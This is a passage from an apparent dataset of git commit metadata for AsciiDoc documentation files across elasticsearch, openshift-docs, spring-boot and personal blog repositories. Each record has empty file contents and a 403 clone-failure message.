uzha\/elasticsearch,ulkas\/elasticsearch,sdauletau\/elasticsearch,wimvds\/elasticsearch,nazarewk\/elasticsearch,djschny\/elasticsearch,sneivandt\/elasticsearch,vroyer\/elassandra,nellicus\/elasticsearch,LeoYao\/elasticsearch,gfyoung\/elasticsearch,elasticdog\/elasticsearch,mjason3\/elasticsearch,lydonchandra\/elasticsearch,ImpressTV\/elasticsearch,kaneshin\/elasticsearch,wimvds\/elasticsearch,Collaborne\/elasticsearch,markharwood\/elasticsearch,wittyameta\/elasticsearch,zhiqinghuang\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,mcku\/elasticsearch,vietlq\/elasticsearch,pozhidaevak\/elasticsearch,caengcjd\/elasticsearch,YosuaMichael\/elasticsearch,markharwood\/elasticsearch,maddin2016\/elasticsearch,franklanganke\/elasticsearch,PhaedrusTheGreek\/elasticsearch,Ansh90\/elasticsearch,jeteve\/elasticsearch,lightslife\/elasticsearch,glefloch\/elasticsearch,iantruslove\/elasticsearch,wuranbo\/elasticsearch,ESamir\/elasticsearch,gfyoung\/elasticsearch,trangvh\/elasticsearch,Charlesdong\/elasticsearch,linglaiyao1314\/elasticsearch,franklanganke\/elasticsearch,IanvsPoplicola\/elasticsearch,mjhennig\/elasticsearch,MjAbuz\/elasticsearch,xuzha\/elasticsearch,iamjakob\/elasticsearch,ulkas\/elasticsearch,C-Bish\/elasticsearch,areek\/elasticsearch,sc0ttkclark\/elasticsearch,huanzhong\/elasticsearch,zkidkid\/elasticsearch,StefanGor\/elasticsearch,yongminxia\/elasticsearch,rmuir\/elasticsearch,F0lha\/elasticsearch,Charlesdong\/elasticsearch,mapr\/elasticsearch,lmtwga\/elasticsearch,henakamaMSFT\/elasticsearch,kenshin233\/elasticsearch,naveenhooda2000\/elasticsearch,andrejserafim\/elasticsearch,Uiho\/elasticsearch,MetSystem\/elasticsearch,KimTaehee\/elasticsearch,diendt\/elasticsearch,kingaj\/elasticsearch,mortonsykes\/elasticsearch,huanzhong\/elasticsearch,weipinghe\/elasticsearch,njlawton\/elasticsearch,hydro2k\/elasticsearch,linglaiyao1314\/elasticsearch,TonyChai24\/ESSource,obourgain\/elasticsearch,strapdata\/elassandra,yuy168\/elasticsearch,Uiho\/elasticsearch,alexshadow007\/elasticsearch,rmuir\/elasticsearch,Uiho\/elasticsearch,spiegela\/elasticsearch,socialrank\/elasticsearch,umeshdangat\/elasticsearch,knight1128\/elasticsearch,wangtuo\/elasticsearch,hafkensite\/elasticsearch,F0lha\/elasticsearch,wimvds\/elasticsearch,MaineC\/elasticsearch,Stacey-Gammon\/elasticsearch,robin13\/elasticsearch,ivansun1010\/elasticsearch,coding0011\/elasticsearch,LewayneNaidoo\/elasticsearch,nknize\/elasticsearch,Shekharrajak\/elasticsearch,jchampion\/elasticsearch,glefloch\/elasticsearch,jeteve\/elasticsearch,pritishppai\/elasticsearch,AndreKR\/elasticsearch,bestwpw\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,girirajsharma\/elasticsearch,hanswang\/elasticsearch,gingerwizard\/elasticsearch,himanshuag\/elasticsearch,nrkkalyan\/elasticsearch,markwalkom\/elasticsearch,mbrukman\/elasticsearch,ckclark\/elasticsearch,kingaj\/elasticsearch,obourgain\/elasticsearch,Rygbee\/elasticsearch,hydro2k\/elasticsearch,jeteve\/elasticsearch,springning\/elasticsearch,mnylen\/elasticsearch,polyfractal\/elasticsearch,iantruslove\/elasticsearch,fernandozhu\/elasticsearch,artnowo\/elasticsearch,sposam\/elasticsearch,jpountz\/elasticsearch,Shekharrajak\/elasticsearch,achow\/elasticsearch,scottsom\/elasticsearch,TonyChai24\/ESSource,yongminxia\/elasticsearch,umeshdangat\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,nellicus\/elasticsearch,tebriel\/elasticsearch,gingerwizard\/elasticsearch,polyfractal\/elasticsearch,liweinan0423\/elasticsearch,a2lin\/elasticsearch,yuy168\/elasticsearch,xingguang2013\/elasticsearch,fred84\/elasticsearch,camilojd\/elasticsearch,MisterAndersen\/elasticsearch,shreejay\/elasticsearch,adrianbk\/elasticsearch,kunallimaye\/elasticsearch,acchen97\/elasticsearch,nezirus\/elasticsearch,girirajsharma\/elasticsearch,yanjunh\/elasticsearch,MjAbuz\/elasticsearch,mohit\/elasticsearch,ivansun1010\/elasticsearch,MetSystem\/elasticsearch,onegambler\/elasticsearch,vingupta3\/elasticsearch,hanswang\/elasticsearch,fekaputra\/elasticsearch,wbowling\/elasticsearch,jpountz\/elasticsearch,strapdata\/elassandra-test,MaineC\/elasticsearch,jimhooker2002\/elasticsearch,onegambler\/elasticsearch,ivansun1010\/elasticsearch,tkssharma\/elasticsearch,ivansun1010\/elasticsearch,strapdata\/elassandra5-rc,nazarewk\/elasticsearch,PhaedrusTheGreek\/elasticsearch,infusionsoft\/elasticsearch,bestwpw\/elasticsearch,scottsom\/elasticsearch,weipinghe\/elasticsearch,hanswang\/elasticsearch,clintongormley\/elasticsearch,kunallimaye\/elasticsearch,karthikjaps\/elasticsearch,nknize\/elasticsearch,fred84\/elasticsearch,bawse\/elasticsearch,knight1128\/elasticsearch,vingupta3\/elasticsearch,sc0ttkclark\/elasticsearch,Collaborne\/elasticsearch,sneivandt\/elasticsearch,lydonchandra\/elasticsearch,pablocastro\/elasticsearch,iamjakob\/elasticsearch,djschny\/elasticsearch,beiske\/elasticsearch,linglaiyao1314\/elasticsearch,JSCooke\/elasticsearch,mgalushka\/elasticsearch,slavau\/elasticsearch,Siddartha07\/elasticsearch,coding0011\/elasticsearch,slavau\/elasticsearch,tkssharma\/elasticsearch,likaiwalkman\/elasticsearch,pranavraman\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,wenpos\/elasticsearch,maddin2016\/elasticsearch,PhaedrusTheGreek\/elasticsearch,strapdata\/elassandra-test,hafkensite\/elasticsearch,fforbeck\/elasticsearch,huanzhong\/elasticsearch,palecur\/elasticsearch,umeshdangat\/elasticsearch,abibell\/elasticsearch,mbrukman\/elasticsearch,mortonsykes\/elasticsearch,amit-shar\/elasticsearch,djschny\/elasticsearch,vingupta3\/elasticsearch,dylan8902\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,alexshadow007\/elasticsearch,masterweb121\/elasticsearch,Shepard1212\/elasticsearch,MjAbuz\/elasticsearch,hirdesh2008\/elasticsearch,likaiwalkman\/elasticsearch,djschny\/elasticsearch,myelin\/elasticsearch,karthikjaps\/elasticsearch,gingerwizard\/elasticsearch,truemped\/elasticsearch,alexshadow007\/elasticsearch,kenshin233\/elasticsearch,HonzaKral\/elasticsearch,nazarewk\/elasticsearch,slavau\/elasticsearch,jbertouch\/elasticsearch,strapdata\/elassandra,JervyShi\/elasticsearch,adrianbk\/elasticsearch,apepper\/elasticsearch,wuranbo\/elasticsearch,umeshdangat\/elasticsearch,camilojd\/elasticsearch,yynil\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,uschindler\/elasticsearch,queirozfcom\/elasticsearch,xuzha\/elasticsearch,Helen-Zhao\/elasticsearch,xuzha\/elasticsearch,iamjakob\/elasticsearch,lks21c\/elasticsearch,kalburgimanjunath\/elasticsearch,JervyShi\/elasticsearch,onegambler\/elasticsearch,achow\/elasticsearch,hydro2k\/elasticsearch,mcku\/elasticsearch,fred84\/elasticsearch,nomoa\/elasticsearch,mohit\/elasticsearch,nomoa\/elasticsearch,ricardocerq\/elasticsearch,dylan8902\/elasticsearch,gmarz\/elasticsearch,diendt\/elasticsearch,kunallimaye\/elasticsearch,lydonchandra\/elasticsearch,Brijeshrpatel9\/elasticsearch,truemped\/elasticsearch,coding0011\/elasticsearch,sdauletau\/elasticsearch,kingaj\/elasticsearch,rajanm\/elasticsearch,pozhidaevak\/elasticsearch,rento19962\/elasticsearch,vingupta3\/elasticsearch,nellicus\/elasticsearch,ESamir\/elasticsearch,vingupta3\/elasticsearch,KimTaehee\/elasticsearch,fforbeck\/elasticsearch,rmuir\/elasticsearch,Widen\/elasticsearch,yanjunh\/elasticsearch,tebriel\/elasticsearch,HonzaKral\/elasticsearch,HonzaKral\/elasticsearch,palecur\/elasticsearch,hirdesh2008\/elasticsearch,kunallimaye\/elasticsearch,nilabhsagar\/elasticsearch,TonyChai24\/ESSource,amit-shar\/elasticsearch,amit-shar\/elasticsearch,mohit\/elasticsearch,xingguang2013\/elasticsearch,TonyChai24\/ESSource,scorpionvicky\/elasticsearch,girirajsharma\/elasticsearch,iacdingping\/elasticsearch,andrejserafim\/elasticsearch,uschindler\/elasticsearch,lydonchandra\/elasticsearch,zhiqinghuang\/elasticsearch,njlawton\/elasticsearch,tebriel\/elasticsearch,cnfire\/elasticsearch-1,Brijeshrpatel9\/elasticsearch,iantruslove\/elasticsearch,JervyShi\/elasticsearch,Brijeshrpatel9\/elasticsearch,jango2015\/elasticsearch,yynil\/elasticsearch,Uiho\/elasticsearch,ouyangkongtong\/elasticsearch,hafkensite\/elasticsearch,cnfire\/elasticsearch-1,KimTaehee\/elasticsearch,glefloch\/elasticsearch,markwalkom\/elasticsearch,MisterAndersen\/elasticsearch,artnowo\/elasticsearch,pranavraman\/elasticsearch,GlenRSmith\/elasticsearch,StefanGor\/elasticsearch,scottsom\/elasticsearch,winstonewert\/elasticsearch,LeoYao\/elasticsearch,wbowling\/elasticsearch,pranavraman\/elasticsearch,socialrank\/elasticsearch,adrianbk\/elasticsearch,awislowski\/elasticsearch,beiske\/elasticsearch,Brijeshrpatel9\/elasticsearch,MisterAndersen\/elasticsearch,nknize\/elasticsearch,elancom\/elasticsearch,sposam\/elasticsearch,dongjoon-hyun\/elasticsearch,KimTaehee\/elasticsearch,masterweb121\/elasticsearch,knight1128\/elasticsearch,polyfractal\/elasticsearch,njlawton\/elasticsearch,MichaelLiZhou\/elasticsearch,rlugojr\/elasticsearch,avikurapati\/elasticsearch,MjAbuz\/elasticsearch,fforbeck\/elasticsearch,YosuaMichael\/elasticsearch,lightslife\/elasticsearch,himanshuag\/elasticsearch,Helen-Zhao\/elasticsearch,sc0ttkclark\/elasticsearch,knight1128\/elasticsearch,petabytedata\/elasticsearch,ricardocerq\/elasticsearch,likaiwalkman\/elasticsearch,baishuo\/elasticsearch_v2.1.0-baishuo,queirozfcom\/elasticsearch,pranavraman\/elasticsearch,iantruslove\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,episerver\/elasticsearch,amit-shar\/elasticsearch,spiegela\/elasticsearch,mikemccand\/elasticsearch,ESamir\/elasticsearch,elasticdog\/elasticsearch,kingaj\/elasticsearch,adrianbk\/elasticsearch,LeoYao\/elasticsearch,lydonchandra\/elasticsearch,hafkensite\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,knight1128\/elasticsearch,wittyameta\/elasticsearch,martinstuga\/elasticsearch,geidies\/elasticsearch,jchampion\/elasticsearch,zhiqinghuang\/elasticsearch,lks21c\/elasticsearch,ulkas\/elasticsearch,nazarewk\/elasticsearch,hafkensite\/elasticsearch,snikch\/elasticsearch,ulkas\/elasticsearch,mjason3\/elasticsearch,ulkas\/elasticsearch,yuy168\/elasticsearch,jango2015\/elasticsearch,mjhennig\/elasticsearch,fekaputra\/elasticsearch,i-am-Nathan\/elasticsearch,lzo\/elasticsearch-1,wuranbo\/elasticsearch,rmuir\/elasticsearch,mm0\/elasticsearch,socialrank\/elasticsearch,brandonkearby\/elasticsearch,jimczi\/elasticsearch,pablocastro\/elasticsearch,geidies\/elasticsearch,kunallimaye\/elasticsearch,palecur\/elasticsearch,amit-shar\/elasticsearch,wuranbo\/elasticsearch,nrkkalyan\/elasticsearch,MichaelLiZhou\/elasticsearch,fred84\/elasticsearch,Rygbee\/elasticsearch,dongjoon-hyun\/elasticsearch,MichaelLiZhou\/elasticsearch,C-Bish\/elasticsearch,LewayneNaidoo\/elasticsearch,trangvh\/elasticsearch,Helen-Zhao\/elasticsearch,GlenRSmith\/elasticsearch,elasticdog\/elasticsearch,kaneshin\/elasticsearch,hafkensite\/elasticsearch,areek\/elasticsearch,nezirus\/elasticsearch,dpursehouse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,linglaiyao1314\/elasticsearch,dylan8902\/elasticsearch,schonfeld\/elasticsearch,fekaputra\/elasticsearch,brandonkearby\/elasticsearch,sreeramjayan\/elasticsearch,AndreKR\/elasticsearch,alexshadow007\/elasticsearch,truemped\/elasticsearch,hirdesh2008\/elasticsearch,springning\/elasticsearch,yongminxia\/elasticsearch,Uiho\/elasticsearch,xingguang2013\/elasticsearch,infusionsoft\/elasticsearch,KimTaehee\/elasticsearch,acchen97\/elasticsearch,springning\/elasticsearch,kaneshin\/elasticsearch,martinstuga\/elasticsearch,xingguang2013\/elasticsearch,drewr\/elasticsearch,mnylen\/elasticsearch,yynil\/elasticsearch,mgalushka\/elasticsearch,lmtwga\/elasticsearch,episerver\/elasticsearch,jchampion\/elasticsearch,rento19962\/elasticsearch,yuy168\/elasticsearch,petabytedata\/elasticsearch,rento19962\/elasticsearch,strapdata\/elassandra5-rc,nellicus\/elasticsearch,ZTE-PaaS\/elasticsearch,18098924759\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,jango2015\/elasticsearch,mjhennig\/elasticsearch,rhoml\/elasticsearch,episerver\/elasticsearch,kingaj\/elasticsearch,Ansh90\/elasticsearch,pranavraman\/elasticsearch,cnfire\/elasticsearch-1,Collaborne\/elasticsearch,MjAbuz\/elasticsearch,yuy168\/elasticsearch,sdauletau\/elasticsearch,vroyer\/elasticassandra,kalburgimanjunath\/elasticsearch,xuzha\/elasticsearch,elasticdog\/elasticsearch,mcku\/elasticsearch,apepper\/elasticsearch,ckclark\/elasticsearch,s1monw\/elasticsearch,pritishppai\/elasticsearch,trangvh\/elasticsearch,snikch\/elasticsearch,lightslife\/elasticsearch,diendt\/elasticsearch,pozhidaevak\/elasticsearch,ouyangkongtong\/elasticsearch,xingguang2013\/elasticsearch,gfyoung\/elasticsearch,mm0\/elasticsearch,clintongormley\/elasticsearch,jpountz\/elasticsearch,karthikjaps\/elasticsearch,Charlesdong\/elasticsearch,lmtwga\/elasticsearch,wangtuo\/elasticsearch,myelin\/elasticsearch,schonfeld\/elasticsearch,schonfeld\/elasticsearch,yynil\/elasticsearch,onegambler\/elasticsearch,iantruslove\/elasticsearch,sposam\/elasticsearch,vietlq\/elasticsearch,likaiwalkman\/elasticsearch,TonyChai24\/ESSource","old_file":"docs\/reference\/query-dsl\/geo-polygon-query.asciidoc","new_file":"docs\/reference\/query-dsl\/geo-polygon-query.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"085688150a165a02128207fb880988c744e1038b","subject":"Formatting","message":"Formatting\n","repos":"oliviercailloux\/java-course,oliviercailloux\/jee,oliviercailloux\/java-course","old_file":"Search path\/Exercices.adoc","new_file":"Search path\/Exercices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/jee.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2bf5752be33c06a2c022bd474027b4cd4c0d71be","subject":"Update 2016-04-05-Eintrag-3.adoc","message":"Update 2016-04-05-Eintrag-3.adoc","repos":"soyabeen\/soyabeen.github.io,soyabeen\/soyabeen.github.io,soyabeen\/soyabeen.github.io,soyabeen\/soyabeen.github.io","old_file":"_posts\/2016-04-05-Eintrag-3.adoc","new_file":"_posts\/2016-04-05-Eintrag-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/soyabeen\/soyabeen.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eed22138060bf93fb6d9ea1ea4e2dbefdec4f835","subject":"Update 2015-12-30-Demo-for-mojs-Library.adoc","message":"Update 2015-12-30-Demo-for-mojs-Library.adoc","repos":"prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io,prateekjadhwani\/prateekjadhwani.github.io","old_file":"_posts\/2015-12-30-Demo-for-mojs-Library.adoc","new_file":"_posts\/2015-12-30-Demo-for-mojs-Library.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/prateekjadhwani\/prateekjadhwani.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c30c74b8dca157bc41a497c50028ff9ff75e3801","subject":"Update 2016-04-15-Introduccion-a-Ruby.adoc","message":"Update 2016-04-15-Introduccion-a-Ruby.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_file":"_posts\/2016-04-15-Introduccion-a-Ruby.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f18c53386895da2bdb6c01589b7f3a954c4cc7bf","subject":"Update 2016-08-09-Santorini-map-guide.adoc","message":"Update 2016-08-09-Santorini-map-guide.adoc","repos":"danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io,danharr\/danharr.github.io","old_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_file":"_posts\/2016-08-09-Santorini-map-guide.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/danharr\/danharr.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2fee434bc7aa72f2896b24c3b5e1441b5294ad3f","subject":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","message":"Update 2018-10-10-Python-A-W-S-Lambda.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_file":"_posts\/2018-10-10-Python-A-W-S-Lambda.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f9ba807b16c2ad37c82ef702c265c9b8f6c7f6c","subject":"CNV16208d Adding dummy file for 4.11 release notes","message":"CNV16208d Adding dummy file for 4.11 release notes\n\nCNV16208d Dummy file for 4.11 RN\n\nCNV16208d Dummy file for 4.11 RN 2\n\nReverting file to previous state\n\nCNV16208d Dummy file for 4.11 RN 3\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"virt\/virt-4-11-release-notes.adoc","new_file":"virt\/virt-4-11-release-notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5dec9067d9444cb9fdd00eca2984d6fa78006ed2","subject":"Update 2016-06-18-Non-secure-icons.adoc","message":"Update 2016-06-18-Non-secure-icons.adoc","repos":"simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io,simevidas\/simevidas.github.io","old_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_file":"_posts\/2016-06-18-Non-secure-icons.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/simevidas\/simevidas.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"66093f1f51bec2f048ce1ea994a844f0c5dce865","subject":"Update 2015-05-16-Faustino-loeza-Perez.adoc","message":"Update 2015-05-16-Faustino-loeza-Perez.adoc","repos":"faustinoloeza\/blog,faustinoloeza\/blog,faustinoloeza\/blog","old_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_file":"_posts\/2015-05-16-Faustino-loeza-Perez.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/faustinoloeza\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0ac3509a99fdc0cefb324643a5ed55286c502a7a","subject":"ssh-agent and ssh-add at login","message":"ssh-agent and ssh-add at login\n","repos":"0xMF\/toybox","old_file":"captain's_log.asciidoc","new_file":"captain's_log.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/0xMF\/toybox.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"1fe85537fc24bdbc5b3473760595d2eb8f2fbbc6","subject":"Update 2014-09-16-URI-bug-fixed.adoc","message":"Update 2014-09-16-URI-bug-fixed.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-09-16-URI-bug-fixed.adoc","new_file":"_posts\/2014-09-16-URI-bug-fixed.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f14ab4d40904f45f6938eb34e8a7d9673ef7970","subject":"Update 2017-05-27-first-article.adoc","message":"Update 2017-05-27-first-article.adoc","repos":"cszongyang\/myzone,cszongyang\/myzone","old_file":"_posts\/2017-05-27-first-article.adoc","new_file":"_posts\/2017-05-27-first-article.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cszongyang\/myzone.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f352d7e3ca457fe75a28ca377bb5a6cda77e4cca","subject":"Update 2018-12-20-jira-howtouse.adoc","message":"Update 2018-12-20-jira-howtouse.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-12-20-jira-howtouse.adoc","new_file":"_posts\/2018-12-20-jira-howtouse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e1d352a05c373ca8cd51e1fb7385fc34d0ded7b3","subject":"Fixed output from oc get cj in updating Logging page","message":"Fixed output from oc get cj in updating Logging page\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/cluster-logging-updating-logging.adoc","new_file":"modules\/cluster-logging-updating-logging.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vikram-redhat\/openshift-docs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"2e86f0f89088220edb3f7fc828cbcd5ba1dc9615","subject":"Update instructions in the the README for building reference docs","message":"Update instructions in the the README for building reference docs\n\nThe instructions should have been updated as part of the work on\ngh-5267 so that the zip of all of the starter poms is available to\nthe documentation's build. With that fixed, the current instructions\nstill fail as the javadoc fails to generated as a result of\norg.springframework.boot:spring-boot:test-jar:tests being unavailable.\nThis can be avoid by simply not trying to build the javadoc, i.e.\nby running generate-resources rather than install.\n\nCloses gh-5633\n","repos":"ihoneymon\/spring-boot,thomasdarimont\/spring-boot,lucassaldanha\/spring-boot,vakninr\/spring-boot,philwebb\/spring-boot-concourse,aahlenst\/spring-boot,cleverjava\/jenkins2-course-spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,aahlenst\/spring-boot,htynkn\/spring-boot,dreis2211\/spring-boot,bijukunjummen\/spring-boot,mbenson\/spring-boot,jbovet\/spring-boot,mbogoevici\/spring-boot,brettwooldridge\/spring-boot,felipeg48\/spring-boot,Buzzardo\/spring-boot,scottfrederick\/spring-boot,mbenson\/spring-boot,linead\/spring-boot,minmay\/spring-boot,bclozel\/spring-boot,philwebb\/spring-boot,jvz\/spring-boot,kdvolder\/spring-boot,ilayaperumalg\/spring-boot,jvz\/spring-boot,RichardCSantana\/spring-boot,NetoDevel\/spring-boot,hqrt\/jenkins2-course-spring-boot,shakuzen\/spring-boot,tiarebalbi\/spring-boot,Buzzardo\/spring-boot,mbenson\/spring-boot,javyzheng\/spring-boot,zhanhb\/spring-boot,tsachev\/spring-boot,chrylis\/spring-boot,lburgazzoli\/spring-boot,ollie314\/spring-boot,vpavic\/spring-boot,akmaharshi\/jenkins,spring-projects\/spring-boot,tsachev\/spring-boot,drumonii\/spring-boot,ihoneymon\/spring-boot,jayarampradhan\/spring-boot,akmaharshi\/jenkins,dreis2211\/spring-boot,SaravananParthasarathy\/SPSDemo,nebhale\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,cleverjava\/jenkins2-course-spring-boot,jayarampradhan\/spring-boot,royclarkson\/spring-boot,mosoft521\/spring-boot,olivergierke\/spring-boot,izeye\/spring-boot,mbenson\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,isopov\/spring-boot,tsachev\/spring-boot,ptahchiev\/spring-boot,mosoft521\/spring-boot,philwebb\/spring-boot-concourse,yhj630520\/spring-boot,sbcoba\/spring-boot,aahlenst\/spring-boot,mbogoevici\/spring-boot,herau\/spring-boot,tiarebalbi\/spring-boot,zhanhb\/spring-boot,i007422\/jenkins2-course-spring-boot,linead\/spring-boot,deki\/spring-boot,habuma\/spring-boot,RichardCSantana\/spring-boot,javyzheng\/spring-boot,htynkn\/spring-boot,eddumelendez\/spring-boot,chrylis\/spring-boot,akmaharshi\/jenkins,ptahchiev\/spring-boot,bjornlindstrom\/spring-boot,bijukunjummen\/spring-boot,scottfrederick\/spring-boot,dreis2211\/spring-boot,jxblum\/spring-boot,sebastiankirsch\/spring-boot,sebastiankirsch\/spring-boot,yangdd1205\/spring-boot,habuma\/spring-boot,joshiste\/spring-boot,jmnarloch\/spring-boot,wilkinsona\/spring-boot,brettwooldridge\/spring-boot,michael-simons\/spring-boot,i007422\/jenkins2-course-spring-boot,lburgazzoli\/spring-boot,Nowheresly\/spring-boot,habuma\/spring-boot,tiarebalbi\/spring-boot,vpavic\/spring-boot,herau\/spring-boot,hello2009chen\/spring-boot,hqrt\/jenkins2-course-spring-boot,felipeg48\/spring-boot,isopov\/spring-boot,xiaoleiPENG\/my-project,donhuvy\/spring-boot,lucassaldanha\/spring-boot,philwebb\/spring-boot,sbcoba\/spring-boot,herau\/spring-boot,deki\/spring-boot,dreis2211\/spring-boot,yangdd1205\/spring-boot,hqrt\/jenkins2-course-spring-boot,ollie314\/spring-boot,cleverjava\/jenkins2-course-spring-boot,kamilszymanski\/spring-boot,Buzzardo\/spring-boot,zhanhb\/spring-boot,isopov\/spring-boot,jmnarloch\/spring-boot,thomasdarimont\/spring-boot,mdeinum\/spring-boot,RichardCSantana\/spring-boot,bclozel\/spring-boot,ilayaperumalg\/spring-boot,joshiste\/spring-boot,thomasdarimont\/spring-boot,bjornlindstrom\/spring-boot,htynkn\/spring-boot,deki\/spring-boot,rweisleder\/spring-boot,RichardCSantana\/spring-boot,ptahchiev\/spring-boot,donhuvy\/spring-boot,htynkn\/spring-boot,wilkinsona\/spring-boot,rajendra-chola\/jenkins2-course-spring-boot,isopov\/spring-boot,spring-projects\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,Nowheresly\/spring-boot,philwebb\/spring-boot-concourse,wilkinsona\/spring-boot,minmay\/spring-boot,htynkn\/spring-boot,philwebb\/spring-boot-concourse,donhuvy\/spring-boot,donhuvy\/spring-boot,izeye\/spring-boot,jxblum\/spring-boot,cleverjava\/jenkins2-course-spring-boot,joshthornhill\/spring-boot,ollie314\/spring-boot,bclozel\/spring-boot,bijukunjummen\/spring-boot,drumonii\/spring-boot,spring-projects\/spring-boot,bjornlindstrom\/spring-boot,minmay\/spring-boot,kamilszymanski\/spring-boot,pvorb\/spring-boot,candrews\/spring-boot,qerub\/spring-boot,jayarampradhan\/spring-boot,i007422\/jenkins2-course-spring-boot,brettwooldridge\/spring-boot,yhj630520\/spring-boot,bclozel\/spring-boot,hello2009chen\/spring-boot,ihoneymon\/spring-boot,mdeinum\/spring-boot,dreis2211\/spring-boot,nebhale\/spring-boot,sbcoba\/spring-boot,drumonii\/spring-boot,DeezCashews\/spring-boot,ollie314\/spring-boot,mevasaroj\/jenkins2-course-spring-boot,akmaharshi\/jenkins,NetoDevel\/spring-boot,felipeg48\/spring-boot,qerub\/spring-boot,minmay\/spring-boot,Nowheresly\/spring-boot,kamilszymanski\/spring-boot,kdvolder\/spring-boot,donhuvy\/spring-boot,chrylis\/spring-boot,Nowheresly\/spring-boot,aahlenst\/spring-boot,aahlenst\/spring-boot,tiarebalbi\/spring-boot,kdvolder\/spring-boot,NetoDevel\/spring-boot,tsachev\/spring-boot,wilkinsona\/spring-boot,javyzheng\/spring-boot,brettwooldridge\/spring-boot,habuma\/spring-boot,jmnarloch\/spring-boot,nebhale\/spring-boot,royclarkson\/spring-boot,philwebb\/spring-boot-concourse,mevasaroj\/jenkins2-course-spring-boot,linead\/spring-boot,vpavic\/spring-boot,yhj630520\/spring-boot,philwebb\/spring-boot,rweisle